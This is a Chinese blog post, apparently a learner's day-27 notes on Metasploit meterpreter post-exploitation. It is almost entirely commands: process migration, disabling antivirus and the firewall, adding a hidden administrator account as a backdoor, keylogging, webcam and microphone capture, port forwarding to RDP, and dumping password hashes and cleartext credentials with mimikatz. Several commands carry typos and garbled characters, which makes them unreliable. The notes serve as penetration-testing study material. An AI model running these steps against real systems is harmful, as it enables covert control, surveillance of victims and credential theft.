Cyber Security-Day27(msf后渗透模块)

进程迁移

ps migrate 一个权限高的进程 rurf post/windows/manage/migrate

关闭杀软&&禁止服务

sc config "服务名称" start=disbale以后

就可以net user xyz 123.com /add net localgroup administrators xyz /add

但是需要服务重启,session就会断掉 记得留后门 run killav

通过其shel来关闭防火墙 netsh adcfirewall set allprofiles state off

查看目标机所有流量 run packetrecorder-i1

提取系统信息 run scraper ps 查看进程

migrate 1774切换进程

截屏screenshot

获取系统运行的平台sysinfo

windows的路径\需要转移 linux的话就是/

search -d c:/ -f *.txt 查找通配符 敏感信息

run vnc

 

 

提权模块:

search suggest

use 2

set session 1

set target 1

run

 

 

record_mic 音频录制

webcam_chat 查看摄像头接口

webcam_list 查看摄像头列表

webcam_stream 摄像头获取

端口转发:可以把目标机器的端口一些资产转发到本地,直接打 通用src

portfwd add -l 1188 -r 192.168.40.129 -p 3389

这样把攻击目标转换到本地

本地去

rdesktop 127.0.0.1:1188

 

 

keyscan_start:开启键盘记录功能 keyscan_dump:显示捕捉到的键盘记录信息 keyscan_stop:停止键盘记录 ald:user username password-h ip#在远程目标主机上添加一个 add group user"Domain Admins"username-h ip#将用户添 茄到自标主机的域管理员组中

哈希 解决域的

load mimikatz

load kiwi

meterpreter > load mimikatZ 开xmimikatZ meterpreter>mst#获取hash值 meterpreter>kerberos#获取明文 meterpreter>ssp#获取明文信息 meterpreter>wdigest#获取系统账户信 oeterpreter >mimikatz_command-f a:#必须要以错误的模块来让正 确的模块显示 meterpreter>mimikatz command-f hash:#获取目标 hash meterpreter>mimikatz command-f samdump::hashes meterpreter>mimikatz command-f sekurlsa::searchPa run post/windows/gather/smart hashdump

posted @ 2022-09-15 20:22  Arrest  阅读(25)  评论(0编辑  收藏  举报